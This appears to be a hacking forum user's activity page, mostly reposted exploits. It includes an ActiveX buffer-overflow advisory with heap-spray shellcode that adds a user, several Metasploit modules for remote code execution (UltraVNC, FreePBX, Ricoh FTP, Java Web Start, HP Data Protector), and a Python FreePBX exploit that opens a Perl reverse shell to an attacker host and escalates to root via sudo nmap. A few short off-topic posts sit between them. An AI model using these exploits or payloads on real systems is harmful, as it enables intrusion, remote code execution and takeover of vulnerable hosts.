    TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow camera demo http://67.203.184.58:9193/admin/view.cgi?profile=0 username=guest password=guest Background: The mentioned product, when browsing the device web interface, asks to install an ActiveX control to stream video content. It has the following settings: File version: 1, 1, 52, 18 Product name: UltraMJCam device ActiveX Control Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx ProgID: UltraMJCam.UltraMJCam.1 CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11} Implements IObjectSafety: yes Safe for Scripting (IObjectSafety): True Safe for Initialization (IObjectSafety): True Vulnerability: This ActiveX control exposed the vulnerable OpenFileDlg() method, see typelib: ... /* DISPID=101 */ /* VT_BSTR [8] */ function OpenFileDlg( /* VT_BSTR [8] [in] */ $sFilter ) { /* method OpenFileDlg */ } ... By invoking this method with an overlong argument is possible to overflow a buffer. This is because of an insecure WideCharToMultiByte() call inside UltraMJCamX.ocx: Call stack of main thread Address Stack Procedure / arguments Called from Frame 001279FC 77E6F20B kernel32.77E637DE kernel32.77E6F206 00127A0C 00127A10 0299F958 kernel32.WideCharToMultiByte UltraMJC.0299F952 00127A0C 00127A14 00000003 CodePage = 3 00127A18 00000000 Options = 0 00127A1C 03835C5C WideCharStr = "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 00127A20 FFFFFFFF WideCharCount = FFFFFFFF (-1.) 00127A24 00127A50 MultiByteStr = 00127A50 00127A28 00007532 MultiByteCount = 7532 (30002.) 00127A2C 00000000 pDefaultChar = NULL 00127A30 00000000 pDefaultCharUsed = NULL 00127A3C 029B11D0 UltraMJC.0299F920 UltraMJC.029B11CB 00127A38 ... 0299F934 8B45 08 mov eax,dword ptr ss:[ebp+8] 0299F937 C600 00 mov byte ptr ds:[eax],0 0299F93A 6A 00 push 0 0299F93C 6A 00 push 0 0299F93E 8B4D 10 mov ecx,dword ptr ss:[ebp+10] 0299F941 51 push ecx 0299F942 8B55 08 mov edx,dword ptr ss:[ebp+8] 0299F945 52 push edx 0299F946 6A FF push -1 0299F948 8B45 0C mov eax,dword ptr ss:[ebp+C] 0299F94B 50 push eax 0299F94C 6A 00 push 0 0299F94E 8B4D 14 mov ecx,dword ptr ss:[ebp+14] 0299F951 51 push ecx 0299F952 FF15 20319F02 call dword ptr ds:[<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte <------------ ... The result is that critical structures are overwritten (SEH) allowing to execute arbitrary code against the target browser. As attachment, basic proof of concept code. <!-- TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg() WideCharToMultiByte Remote Buffer Overflow poc IE7-nodep camera demo http://67.203.184.58:9193/admin/view.cgi?profile=0 username=guest password=guest rgod --> <!-- saved from url=(0014)about:internet --> <html> <object classid='clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11' id='obj' /> </object> <script language='javascript'> //add user one, user "sun" pass "tzu" shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" + "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" + "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" + "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" + "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" + "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" + "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" + "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" + "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" + "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" + "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" + "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" + "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" + "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" + "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" + "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" + "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" + "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" + "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" + "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" + "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" + "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" + "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" + "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" + "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" + "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" + "%u7734%u4734%u4570"); bigblock = unescape("%u0c0c%u0c0c"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<1888;i++){memory[i] = block+shellcode} </script> <script defer=defer> var x =""; for (i=0; i<15000; i++){ x = x + "&"; } obj.OpenFileDlg(x); </script> Sursa: TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
  15. The_Arhitect
    Astia vand tot? o vine si pe masa daca are clienti
  16. The_Arhitect
    Degeaba dai bani pe ele, incearca de maine sa nu mai fumezi deloc vezi cat rezisti.
  17. The_Arhitect
    UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer def initialize(info = {}) super(update_info(info, 'Name' => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack. }, 'Author' => 'noperand', 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0610' ], [ 'OSVDB', '42840' ], [ 'BID', '27561' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2 ], 'Privileged' => false, 'DisclosureDate' => 'Feb 6 2008', 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ]) ], self.class) end def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) sploit = rand_text_alpha(1100) # junk, could be more efficient here sploit << "\x00\x04\x00\x00" # value to get around a write sploit << rand_text_alpha(12) # random junk sploit << "\xEB\x06" << make_nops(2) # short relative jump sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer.exe) sploit << payload.encoded =begin We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016"). - These bytes are read directly by a call to ReadExact() with a size of 12. ... if (m_minorVersion == 14 || m_minorVersion == 16) { int size; ReadExact((char *)&size,sizeof(int)); char mytext[1024]; //10k ReadExact(mytext,size); mytext[size]=0; ... If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read. We then append our data. =end sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") client.put(sploit) handler(client) service.close_client(client) end end Sursa: UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
  18. The_Arhitect
    FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution', 'Description' => %q{ This module exploits FreePBX version 2.10.0,2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code to the '$channel' variable in function callme_startcall in order to gain remote code execution. Please note in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs. }, 'Author' => [ 'muts','Martin Tschirsich' ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.exploit-db.com/exploits/18649/' ] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, }, 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 20 2012')) register_options( [ OptString.new("EXTENSION", [ true, "A range of Local extension numbers", "0-100" ]), ], self.class) end def exploit # Check range input if datastore['EXTENSION'] =~ /^(\d+)\-(\d+)$/ min = $1.to_i max = $2.to_i else print_error("Please specify a range for option 'EXTENSION'") return end cmd = Rex::Text.uri_encode(payload.encoded) (min..max).each do |e| connect print_status("#{rhost}:#{rport} - Sending evil request with range #{e.to_s}") res = send_request_raw({ 'method' => 'GET', 'uri' => "/recordings/misc/callme_page.php?action=c&callmenum="+e.to_s+"@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20#{cmd}%0D%0A%0D%0A", 'version' => '1.0', 'vhost' => rhost }) handler disconnect end end end Sursa: FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
  19. The_Arhitect
    Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow" ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp def initialize(info={}) super(update_info(info, 'Name' => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP service. By supplying a long string of data to the USER command, it is possible to trigger a stack-based buffer overflow, which allows remote code execution under the context of the user. Please note that in order to trigger the vulnerability, the server must be configured with a log file name (by default, it's disabled). }, 'License' => MSF_LICENSE, 'Author' => [ 'Julien Ahrens', #Discovery, PoC 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '79691'], ['URL', 'http://secunia.com/advisories/47912'], ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/'] ], 'Payload' => { # Yup, no badchars 'BadChars' => "\x00", }, 'DefaultOptions' => { 'ExitFunction' => "process", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll) 'Offset' => 245 } ] ], 'Privileged' => false, 'DisclosureDate' => "Mar 1 2012", 'DefaultTarget' => 0)) # We're triggering the bug via the USER command, no point to have user/pass # as configurable options. deregister_options('FTPPASS', 'FTPUSER') end def check connect disconnect if banner =~ /220 DSC ftpd 1\.0 FTP Server/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit buf = '' buf << rand_text_alpha(target['Offset'], payload_badchars) buf << [target.ret].pack('V') buf << make_nops(20) buf << payload.encoded print_status("#{rhost}:#{rport} - Sending #{self.name}") connect send_user(buf) handler disconnect end end =begin 0:002> lmv m SR10 start end module name 00400000 00410000 SR10 (deferred) Image path: C:\Program Files\DC Software\SR10.exe Image name: SR10.exe Timestamp: Mon May 19 23:55:32 2008 (483275E4) CheckSum: 00000000 ImageSize: 00010000 File version: 1.0.0.520 Product version: 1.0.0.0 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 1.0 App File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Ricoh Co.,Ltd. ProductName: SR-10 InternalName: SR-10 OriginalFilename: SR10.EXE ProductVersion: 1, 0, 0, 0 FileVersion: 1, 0, 0, 520 PrivateBuild: 1, 0, 0, 520 SpecialBuild: 1, 0, 0, 520 FileDescription: SR-10 Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most stable component we can use is msvcrt.dll for now. =end Sursa: Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow"
  20. The_Arhitect
    FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit #!/usr/bin/python ############################################################ # Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit # Google Dork: oy vey # Date: March 23rd, 2010 # Author: muts # Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. # Tested on: multiple # CVE : notyet # Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/ # Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt ############################################################ # Discovered by Martin Tschirsich # http://seclists.org/fulldisclosure/2012/Mar/234 # http://www.exploit-db.com/exploits/18649 ############################################################ import urllib rhost="172.16.254.72" lhost="172.16.254.223" lport=443 extension="1000" # Reverse shell payload url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' urllib.urlopen(url) # On Elastix, once we have a shell, we can escalate to root: # root@bt:~# nc -lvp 443 # listening on [any] 443 ... # connect to [172.16.254.223] from voip [172.16.254.72] 43415 # id # uid=100(asterisk) gid=101(asterisk) # sudo nmap --interactive # Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) # Welcome to Interactive Mode -- press h <enter> for help # nmap> !sh # id # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) Sursa: FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit
  21. The_Arhitect
    OneFileCMS - Failure to Restrict URL Access # Exploit Title: OneFileCMS - Failure to Restrict URL Access # Date: 12th March 2012 # Author: Abhi M Balakrishnan # Software Link: https://raw.github.com/rocktronica/OneFileCMS/f265961d0646890c9efe05b93983124abc18c56e/onefilecms.php # Version: upto 1.1.4 # Tested on: Apache-2.2.17, PHP-5.2.17, MySQL-5.5.9, Windows 6.2 # Vulnerability Status: Fixed on version 1.1.5. Developer was very quick in responding to mails and to fix the issue. Bugfix version released within minutes after the notification. Great work.!!! Commit: https://github.com/rocktronica/OneFileCMS/commit/a4e36213d9fe3efccc2f6730d29fd2a05c57594b # Vulnerability: Failure to Restrict URL Access, since the redirection mechanism can be bypassed easily # Exploit: Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/ Step 2: Access http://example.com/path/admin.php # PoC Video: http://www.youtube.com/watch?v=0lPz24Z7Q_4 Sursa: OneFileCMS - Failure to Restrict URL Access
  22. The_Arhitect
  23. The_Arhitect
    Sun Java Web Start Plugin Command Line Argument Injection (2012) ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Sun Java Web Start Plugin Command Line Argument Injection (2012)', 'Description' => %q{ This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. }, 'License' => MSF_LICENSE, 'Author' => 'jduck', # Bug reported to Oracle by TELUS 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0500' ], [ 'OSVDB', '79227' ], [ 'BID', '52015' ], [ 'URL', 'http://seclists.org/fulldisclosure/2012/Feb/251' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html' ] ], 'Platform' => 'win', 'Payload' => { 'Space' => 1024, 'BadChars' => '', 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" }, 'Targets' => [ [ 'Automatic', { } ], [ 'Java Runtime on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 14 2012' )) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]), OptString.new('UNCPATH', [ false, 'Override the UNC path to use. (Use with an SMB server)' ]) ], self.class) end def auto_target(cli, request) agent = request.headers['User-Agent'] ret = nil #print_status("Agent: #{agent}") # Check for MSIE and/or WebDAV redirector requests if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/ ret = targets[1] elsif agent =~ /MSIE (6|7|8)\.0/ ret = targets[1] else print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end ret end def on_request_uri(cli, request) # For this exploit, this does little besides ensures the user agent is a recognized one.. mytarget = target if target.name == 'Automatic' mytarget = auto_target(cli, request) if (not mytarget) send_not_found(cli) return end end # Special case to process OPTIONS for / if (request.method == 'OPTIONS' and request.uri == '/') process_options(cli, request, mytarget) return end # Discard requests for ico files if (request.uri =~ /\.ico$/i) send_not_found(cli) return end # If there is no subdirectory in the request, we need to redirect. if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//) if (request.uri == '/') subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' else subdir = request.uri + '/' end print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...") send_redirect(cli, subdir) return else share_name = $1 end # dispatch WebDAV requests based on method first case request.method when 'OPTIONS' process_options(cli, request, mytarget) when 'PROPFIND' process_propfind(cli, request, mytarget) when 'GET' process_get(cli, request, mytarget, share_name) when 'PUT' print_status("Sending 404 for PUT #{request.uri} ...") send_not_found(cli) else print_error("Unexpected request method encountered: #{request.method}") end end # # GET requests # def process_get(cli, request, target, share_name) print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") # dispatch based on extension if (request.uri =~ /\.dll$/i) # # DLL requests sent by IE and the WebDav Mini-Redirector # print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...") # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Generate a DLL based on the payload dll_data = generate_payload_dll({ :code => p.encoded }) # Send it send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' }) elsif (request.uri =~ /\.jnlp$/i) # # Send the jnlp document # # Prepare the UNC path... if (datastore['UNCPATH']) unc = datastore['UNCPATH'].dup else my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] unc = "\\\\" + my_host + "\\" + share_name end # NOTE: we ensure there's only a single backslash here since it will get escaped if unc[0,2] == "\\\\" unc.slice!(0, 1) end http_agent = Rex::Text.rand_text_alpha(8+rand(8)) jnlp_data = <<-EOS <?xml version="1.0" encoding="UTF-8"?> <jnlp version="1"> <information> <title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title> <vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor> <description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description> </information> <resources> <java version="1.3+" initial-heap-size='512m" -J-XXaltjvm=#{unc} "' /> </resources> <resources><java java-vm-args='-Dhttp.agent=#{http_agent}"' /></resources> </jnlp> EOS print_status("Sending JNLP to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, jnlp_data, { 'Content-Type' => 'application/x-java-jnlp-file' }) else print_status("Sending redirect to the JNLP file to #{cli.peerhost}:#{cli.peerport}") jnlp_name = Rex::Text.rand_text_alpha(8 + rand(8)) jnlp_path = get_resource() if jnlp_path[-1,1] != '/' jnlp_path << '/' end jnlp_path << request.uri.split('/')[-1] << '/' jnlp_path << jnlp_name << ".jnlp" send_redirect(cli, jnlp_path, '') end end # # OPTIONS requests sent by the WebDav Mini-Redirector # def process_options(cli, request, target) print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") headers = { #'DASL' => '<DAV:sql>', #'DAV' => '1, 2', 'Allow' => 'OPTIONS, GET, PROPFIND', 'Public' => 'OPTIONS, GET, PROPFIND' } send_response(cli, '', headers) end # # PROPFIND requests sent by the WebDav Mini-Redirector # def process_propfind(cli, request, target) path = request.uri print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") body = '' if (path =~ /\.dll$/i) # Response for the DLL print_status("Sending DLL multistatus for #{path} ...") #<lp1:getcontentlength>45056</lp1:getcontentlength> body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype/> <lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> <lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> <lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag> <lp2:executable>F</lp2:executable> <D:lockdiscovery/> <D:getcontenttype>application/octet-stream</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | elsif (path =~ /\/$/) or (not path.sub('/', '').index('/')) # Response for anything else (generally just /) print_status("Sending directory multistatus for #{path} ...") body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype><D:collection/></lp1:resourcetype> <lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> <lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> <lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag> <D:lockdiscovery/> <D:getcontenttype>httpd/unix-directory</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | else print_status("Sending 404 for #{path} ...") send_not_found(cli) return end # send the response resp = create_response(207, "Multi-Status") resp.body = body resp['Content-Type'] = 'text/xml' cli.send_response(resp) end # # Make sure we're on the right port/path to support WebDAV # def exploit if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' end super end end Sursa: Sun Java Web Start Plugin Command Line Argument Injection (2012)
  24. The_Arhitect
    HP Data Protector 6.1 EXEC_CMD Remote Code Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'HP Data Protector 6.1 EXEC_CMD Remote Code Execution', 'Description' => %q{ This exploit abuses a vulnerability in the HP Data Protector service. This flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD command and traverse back to /bin/sh, this allows arbitrary remote code execution under the context of root. }, 'Author' => [ 'ch0ks', # poc 'c4an', # msf poc 'wireghoul' # Improved msf ], 'References' => [ [ 'CVE', '2011-0923'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/'], [ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'], [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux'] ], 'DisclosureDate' => 'Feb 7 2011', 'Platform' => [ 'unix','linux'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 10000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Targets' => [ [ 'HP Data Protector 6.10/6.11 on Linux', {}] ], 'DefaultTarget' => 0 )) register_options([Opt::RPORT(5555),], self.class) end def exploit user = rand_text_alpha(4) packet = "\x00\x00\x00\xa4\x20\x32\x00\x20" packet << user*2 packet << "\x00\x20\x30\x00\x20" packet << "SYSTEM" packet << "\x00\x20\x63\x34\x61\x6e" packet << "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20" packet << user packet << "\x20\x20\x20\x20\x00\x20" packet << "\x50\x6f\x63" packet << "\x00\x20" packet << "NTAUTHORITY" packet << "\x00\x20" packet << "NTAUTHORITY" packet << "\x00\x20" packet << "NTAUTHORITY" packet << "\x00\x20\x30\x00\x20\x30\x00\x20" packet << "../../../../../../../../../../" shell_mio = "bin/sh" salto = "\n" s = salto.encode shell = shell_mio shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" shell << payload.encoded shell << s sploit = packet + shell begin print_status("Sending our commmand...") connect sock.put(sploit) print_status("Waiting ...") handler # Read command output from socket if cmd/unix/generic payload was used if (datastore['CMD']) res = sock.get print_status(res.to_s) if not res.empty? end rescue print_error("Error in connection or socket") ensure disconnect end end end Sursa: HP Data Protector 6.1 EXEC_CMD Remote Code Execution
  25. The_Arhitect
    Informatica 1 la 1 (101) Criptografie Designul si analiza Algoritmilor Securitatea Computerelor La astea m-am inscris, interesant
×
×
  • Create New...